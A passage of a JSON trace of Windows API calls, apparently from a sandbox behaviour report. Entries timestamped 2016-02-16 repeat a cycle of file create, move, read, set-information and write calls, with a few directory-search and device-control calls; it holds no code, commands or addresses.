"filesystem", "timestamp": "2016-02-16 17:42:05,106", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,116", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,126", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,136", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,136", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,136", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,136", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,146", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,146", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,156", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,156", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,166", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:05,166", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,176", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,176", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,186", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,186", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,196", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,196", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,206", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,206", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,216", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,216", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,216", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,216", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,216", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:05,226", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,226", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,226", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,236", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,236", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,236", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,236", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,236", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,246", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,246", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:05,246", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,256", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,256", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,256", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,256", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,256", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,266", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,266", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:05,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,276", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,276", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,286", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,286", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,296", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,296", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,306", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,306", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,316", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,316", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,326", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,326", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,346", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,346", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,356", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,356", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,356", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,386", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,386", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,386", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:05,386", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,386", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,386", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,396", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,396", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,406", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,416", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,426", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,426", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,426", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,426", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,426", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,426", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,426", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,436", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:05,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtWriteFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,436", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,436", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,446", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,446", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,456", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:05,456", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,456", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,466", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,466", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,466", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,466", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,466", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,466", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,466", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,476", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:42:05,496", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,496", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,506", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,506", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,516", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,516", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,516", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,516", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,516", "api": "NtCreateFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:05,526", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,526", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,526", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,536", "api": "NtWriteFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:05,536", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,536", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,536", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,536", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,536", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,546", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 